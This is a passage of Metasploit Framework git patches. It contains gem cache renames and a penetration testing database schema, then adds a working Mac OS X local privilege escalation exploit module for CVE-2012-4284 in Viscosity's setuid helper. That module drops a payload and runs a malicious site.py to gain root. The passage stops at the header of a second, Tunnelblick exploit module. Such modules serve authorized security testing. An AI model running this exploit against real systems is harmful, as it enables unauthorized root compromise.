rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb
new file mode 100644
index 0000000000..bd6f124190
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb
@@ -0,0 +1,638 @@ +# encoding: UTF-8 +# This file is auto-generated from the current state of the database. Instead +# of editing this file, please use the migrations feature of Active Record to +# incrementally modify your database, and then regenerate this schema definition. +# +# Note that this schema.rb definition is the authoritative source for your +# database schema. If you need to create the application database on another +# system, you should be using db:schema:load, not running all the migrations +# from scratch. The latter is a flawed and unsustainable approach (the more migrations +# you'll amass, the slower it'll run and the greater likelihood for issues). +# +# It's strongly recommended to check this file into your version control system. + +ActiveRecord::Schema.define(:version => 20130228214900) do + + create_table "api_keys", :force => true do |t| + t.text "token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "attachments", :force => true do |t| + t.string "name", :limit => 512 + t.binary "data" + t.string "content_type", :limit => 512 + t.boolean "inline", :default => true, :null => false + t.boolean "zip", :default => false, :null => false + t.integer "campaign_id" + end + + create_table "attachments_email_templates", :id => false, :force => true do |t| + t.integer "attachment_id" + t.integer "email_template_id" + end + + create_table "campaigns", :force => true do |t| + t.integer "workspace_id", :null => false + t.string "name", :limit => 512 + t.text "prefs" + t.integer "status", :default => 0 + t.datetime "started_at" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "clients", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.string "ua_string", :limit => 1024, :null => false + t.string "ua_name", :limit => 64 + t.string "ua_ver", :limit => 32 + t.datetime "updated_at" + t.integer "campaign_id" + end + 
+ create_table "creds", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "user", :limit => 2048 + t.string "pass", :limit => 4096 + t.boolean "active", :default => true + t.string "proof", :limit => 4096 + t.string "ptype", :limit => 256 + t.integer "source_id" + t.string "source_type" + end + + create_table "email_addresses", :force => true do |t| + t.integer "campaign_id", :null => false + t.string "first_name", :limit => 512 + t.string "last_name", :limit => 512 + t.string "address", :limit => 512 + t.boolean "sent", :default => false, :null => false + t.datetime "clicked_at" + end + + create_table "email_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "subject", :limit => 1024 + t.text "body" + t.integer "parent_id" + t.integer "campaign_id" + t.text "prefs" + end + + create_table "events", :force => true do |t| + t.integer "workspace_id" + t.integer "host_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.string "username" + t.text "info" + end + + create_table "exploit_attempts", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.integer "port" + t.string "proto" + t.text "fail_detail" + end + + create_table "exploited_hosts", :force => true do |t| + t.integer "host_id", :null => false + t.integer "service_id" + t.string "session_uuid", :limit => 8 + t.string "name", :limit => 2048 + t.string "payload", :limit => 2048 + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "host_details", :force => true do |t| + t.integer "host_id" + t.integer "nx_console_id" + t.integer "nx_device_id" + t.string 
"src" + t.string "nx_site_name" + t.string "nx_site_importance" + t.string "nx_scan_template" + t.float "nx_risk_score" + end + + create_table "hosts", :force => true do |t| + t.datetime "created_at" + t.string "address", :limit => nil + t.string "mac" + t.string "comm" + t.string "name" + t.string "state" + t.string "os_name" + t.string "os_flavor" + t.string "os_sp" + t.string "os_lang" + t.string "arch" + t.integer "workspace_id" + t.datetime "updated_at" + t.text "purpose" + t.string "info", :limit => 65536 + t.text "comments" + t.text "scope" + t.text "virtual_host" + t.integer "note_count", :default => 0 + t.integer "vuln_count", :default => 0 + t.integer "service_count", :default => 0 + t.integer "host_detail_count", :default => 0 + t.integer "exploit_attempt_count", :default => 0 + end + + add_index "hosts", ["address"], :name => "index_hosts_on_address" + add_index "hosts", ["name"], :name => "index_hosts_on_name" + add_index "hosts", ["os_flavor"], :name => "index_hosts_on_os_flavor" + add_index "hosts", ["os_name"], :name => "index_hosts_on_os_name" + add_index "hosts", ["purpose"], :name => "index_hosts_on_purpose" + add_index "hosts", ["state"], :name => "index_hosts_on_state" + + create_table "hosts_tags", :id => false, :force => true do |t| + t.integer "host_id" + t.integer "tag_id" + end + + create_table "imported_creds", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "user", :limit => 512 + t.string "pass", :limit => 512 + t.string "ptype", :limit => 16, :default => "password" + end + + create_table "listeners", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.integer "workspace_id", :default => 1, :null => false + t.integer "task_id" + t.boolean "enabled", :default => true + t.text "owner" + t.text "payload" + t.text "address" + t.integer "port" + t.binary "options" + t.text "macro" + end + + create_table "loots", :force => true do |t| + 
t.integer "workspace_id", :default => 1, :null => false + t.integer "host_id" + t.integer "service_id" + t.string "ltype", :limit => 512 + t.string "path", :limit => 1024 + t.text "data" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "content_type" + t.text "name" + t.text "info" + end + + create_table "macros", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "owner" + t.text "name" + t.text "description" + t.binary "actions" + t.binary "prefs" + end + + create_table "mod_refs", :force => true do |t| + t.string "module", :limit => 1024 + t.string "mtype", :limit => 128 + t.text "ref" + end + + create_table "module_actions", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_actions", ["module_detail_id"], :name => "index_module_actions_on_module_detail_id" + + create_table "module_archs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_archs", ["module_detail_id"], :name => "index_module_archs_on_module_detail_id" + + create_table "module_authors", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + t.text "email" + end + + add_index "module_authors", ["module_detail_id"], :name => "index_module_authors_on_module_detail_id" + + create_table "module_details", :force => true do |t| + t.datetime "mtime" + t.text "file" + t.string "mtype" + t.text "refname" + t.text "fullname" + t.text "name" + t.integer "rank" + t.text "description" + t.string "license" + t.boolean "privileged" + t.datetime "disclosure_date" + t.integer "default_target" + t.text "default_action" + t.string "stance" + t.boolean "ready" + end + + add_index "module_details", ["description"], :name => "index_module_details_on_description" + add_index "module_details", ["mtype"], :name => "index_module_details_on_mtype" + add_index "module_details", ["name"], :name => 
"index_module_details_on_name" + add_index "module_details", ["refname"], :name => "index_module_details_on_refname" + + create_table "module_mixins", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_mixins", ["module_detail_id"], :name => "index_module_mixins_on_module_detail_id" + + create_table "module_platforms", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_platforms", ["module_detail_id"], :name => "index_module_platforms_on_module_detail_id" + + create_table "module_refs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_refs", ["module_detail_id"], :name => "index_module_refs_on_module_detail_id" + add_index "module_refs", ["name"], :name => "index_module_refs_on_name" + + create_table "module_targets", :force => true do |t| + t.integer "module_detail_id" + t.integer "index" + t.text "name" + end + + add_index "module_targets", ["module_detail_id"], :name => "index_module_targets_on_module_detail_id" + + create_table "nexpose_consoles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "enabled", :default => true + t.text "owner" + t.text "address" + t.integer "port", :default => 3780 + t.text "username" + t.text "password" + t.text "status" + t.text "version" + t.text "cert" + t.binary "cached_sites" + t.text "name" + end + + create_table "notes", :force => true do |t| + t.datetime "created_at" + t.string "ntype", :limit => 512 + t.integer "workspace_id", :default => 1, :null => false + t.integer "service_id" + t.integer "host_id" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.text "data" + end + + add_index "notes", ["ntype"], :name => "index_notes_on_ntype" + + create_table "profiles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "active", 
:default => true + t.text "name" + t.text "owner" + t.binary "settings" + end + + create_table "refs", :force => true do |t| + t.integer "ref_id" + t.datetime "created_at" + t.string "name", :limit => 512 + t.datetime "updated_at" + end + + add_index "refs", ["name"], :name => "index_refs_on_name" + + create_table "report_templates", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "path", :limit => 1024 + t.text "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "reports", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "rtype" + t.string "path", :limit => 1024 + t.text "options" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.datetime "downloaded_at" + t.integer "task_id" + t.string "name", :limit => 63 + end + + create_table "routes", :force => true do |t| + t.integer "session_id" + t.string "subnet" + t.string "netmask" + end + + create_table "services", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.integer "port", :null => false + t.string "proto", :limit => 16, :null => false + t.string "state" + t.string "name" + t.datetime "updated_at" + t.text "info" + end + + add_index "services", ["name"], :name => "index_services_on_name" + add_index "services", ["port"], :name => "index_services_on_port" + add_index "services", ["proto"], :name => "index_services_on_proto" + add_index "services", ["state"], :name => "index_services_on_state" + + create_table "session_events", :force => true do |t| + t.integer "session_id" + t.string "etype" + t.binary "command" + t.binary "output" + t.string "remote_path" + t.string "local_path" + t.datetime "created_at" + end + + create_table "sessions", :force => true do |t| + t.integer "host_id" + t.string "stype" + t.string "via_exploit" + t.string "via_payload" + t.string 
"desc" + t.integer "port" + t.string "platform" + t.text "datastore" + t.datetime "opened_at", :null => false + t.datetime "closed_at" + t.string "close_reason" + t.integer "local_id" + t.datetime "last_seen" + end + + create_table "tags", :force => true do |t| + t.integer "user_id" + t.string "name", :limit => 1024 + t.text "desc" + t.boolean "report_summary", :default => false, :null => false + t.boolean "report_detail", :default => false, :null => false + t.boolean "critical", :default => false, :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "tasks", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "module" + t.datetime "completed_at" + t.string "path", :limit => 1024 + t.string "info" + t.string "description" + t.integer "progress" + t.text "options" + t.text "error" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "result" + t.string "module_uuid", :limit => 8 + t.binary "settings" + end + + create_table "users", :force => true do |t| + t.string "username" + t.string "crypted_password" + t.string "password_salt" + t.string "persistence_token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "fullname" + t.string "email" + t.string "phone" + t.string "company" + t.string "prefs", :limit => 524288 + t.boolean "admin", :default => true, :null => false + end + + create_table "vuln_attempts", :force => true do |t| + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.text "fail_detail" + end + + create_table "vuln_details", :force => true do |t| + t.integer "vuln_id" + t.float "cvss_score" + t.string "cvss_vector" + t.string "title" + t.text "description" + t.text "solution" + t.binary "proof" + t.integer 
"nx_console_id" + t.integer "nx_device_id" + t.string "nx_vuln_id" + t.float "nx_severity" + t.float "nx_pci_severity" + t.datetime "nx_published" + t.datetime "nx_added" + t.datetime "nx_modified" + t.text "nx_tags" + t.text "nx_vuln_status" + t.text "nx_proof_key" + t.string "src" + t.integer "nx_scan_id" + t.datetime "nx_vulnerable_since" + t.string "nx_pci_compliance_status" + end + + create_table "vulns", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.string "info", :limit => 65536 + t.datetime "exploited_at" + t.integer "vuln_detail_count", :default => 0 + t.integer "vuln_attempt_count", :default => 0 + end + + add_index "vulns", ["name"], :name => "index_vulns_on_name" + + create_table "vulns_refs", :id => false, :force => true do |t| + t.integer "ref_id" + t.integer "vuln_id" + end + + create_table "web_forms", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.string "method", :limit => 1024 + t.text "params" + t.text "query" + end + + add_index "web_forms", ["path"], :name => "index_web_forms_on_path" + + create_table "web_pages", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.text "query" + t.integer "code", :null => false + t.text "cookie" + t.text "auth" + t.text "ctype" + t.datetime "mtime" + t.text "location" + t.text "headers" + t.binary "body" + t.binary "request" + end + + add_index "web_pages", ["path"], :name => "index_web_pages_on_path" + add_index "web_pages", ["query"], :name => "index_web_pages_on_query" + + create_table "web_sites", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "vhost", :limit => 2048 + 
t.text "comments" + t.text "options" + end + + add_index "web_sites", ["comments"], :name => "index_web_sites_on_comments" + add_index "web_sites", ["options"], :name => "index_web_sites_on_options" + add_index "web_sites", ["vhost"], :name => "index_web_sites_on_vhost" + + create_table "web_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "title", :limit => 512 + t.string "body", :limit => 524288 + t.integer "campaign_id" + t.text "prefs" + end + + create_table "web_vulns", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path", :null => false + t.string "method", :limit => 1024, :null => false + t.text "params", :null => false + t.text "pname", :null => false + t.integer "risk", :null => false + t.string "name", :limit => 1024, :null => false + t.text "query" + t.text "category", :null => false + t.text "confidence", :null => false + t.text "description" + t.text "blame" + t.binary "request" + t.binary "proof", :null => false + t.string "owner" + t.text "payload" + end + + add_index "web_vulns", ["method"], :name => "index_web_vulns_on_method" + add_index "web_vulns", ["name"], :name => "index_web_vulns_on_name" + add_index "web_vulns", ["path"], :name => "index_web_vulns_on_path" + + create_table "wmap_requests", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.string "meth", :limit => 32 + t.text "path" + t.text "headers" + t.text "query" + t.text "body" + t.string "respcode", :limit => 16 + t.text "resphead" + t.text "response" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "wmap_targets", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.integer "selected" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "workspace_members", :id => false, 
:force => true do |t| + t.integer "workspace_id", :null => false + t.integer "user_id", :null => false + end + + create_table "workspaces", :force => true do |t| + t.string "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "boundary", :limit => 4096 + t.string "description", :limit => 4096 + t.integer "owner_id" + t.boolean "limit_to_network", :default => false, :null => false + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb index 66d1de6804..32b4bef890 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb @@ -11,6 +11,8 @@ Bundler.require(:default, :test) # full backtrace in logs so its easier to trace errors Rails.backtrace_cleaner.remove_silencers! +require 'simplecov' + # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. support_glob = MetasploitDataModels.root.join('spec', 'support', '**', '*.rb') diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec similarity index 72% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec index 7b728268c3..a88f2d9cd0 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec 
@@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.3.0" + s.version = "0.5.1" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2012-11-01" + s.date = "2013-03-01" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] @@ -21,20 +21,26 @@ Gem::Specification.new do |s| if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then s.add_development_dependency(%q, [">= 0"]) - s.add_runtime_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_runtime_dependency(%q, [">= 3.2.10"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) end else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) From 76180f22fcb5a69e12239278783ab37db5d5143b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 13:23:21 +0100 Subject: [PATCH 129/139] added module for cve-2012-4284 --- .../exploits/osx/local/setuid_viscosity.rb | 122 ++++++++++++++++++ 1 file changed, 122 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_viscosity.rb 
diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb
new file mode 100644
index 0000000000..c068b4c3a1
--- /dev/null
+++ b/modules/exploits/osx/local/setuid_viscosity.rb
@@ -0,0 +1,122 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/linux/priv' +require 'msf/core/exploit/exe' + + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Viscosity Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The + vulnerability exists in the setuid ViscosityHelper, where an insufficient + validation of path names allows execution of arbitrary python code as root. + This module has been tested successfully on Viscosity 1.4.1 over Mac OS X + 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-4284' ], + [ 'OSVDB', '84709' ], + [ 'EDB', '20485' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. 
Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 12 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + ], self.class) + end + + def check + if not file?(datastore["Viscosity"]) + print_error "ViscosityHelper not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Viscosity"]} -type f -user root -perm -4000") + + if check =~ /ViscosityHelper/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + file_rm(@python_file) + file_rm("#{@python_file}c") + file_rm(@exe_file) + end + + def exploit + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + + evil_python = %Q{ +import os +os.setuid(0) +os.setgid(0) +os.system("chown root #{@exe_file}") +os.system("chmod 6777 #{@exe_file}") +os.execl("#{@exe_file}", "#{exe_name}") + } + @python_file = "#{datastore["WritableDir"]}/site.py" + print_status("Dropping python #{@python_file}...") + write_file(@python_file, evil_python) + + print_status("Creating symlink...") + link_name = rand_text_alpha(8) + @link = "#{datastore["WritableDir"]}/#{link_name}" + cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}" + + 
print_status("Running...") + begin + cmd_exec "#{@link}" + rescue + print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...") + clean + return + end + print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}") + end +end + From 81e2dbc71e5d69128e108c73cf0de2e2a70c281b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 19:48:12 +0100 Subject: [PATCH 130/139] added module for CVE-2012-3485 --- .../exploits/osx/local/setuid_tunnelblick.rb | 121 ++++++++++++++++++ 1 file changed, 121 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_tunnelblick.rb diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb new file mode 100644 index 0000000000..66db2db4d9 --- /dev/null +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb 
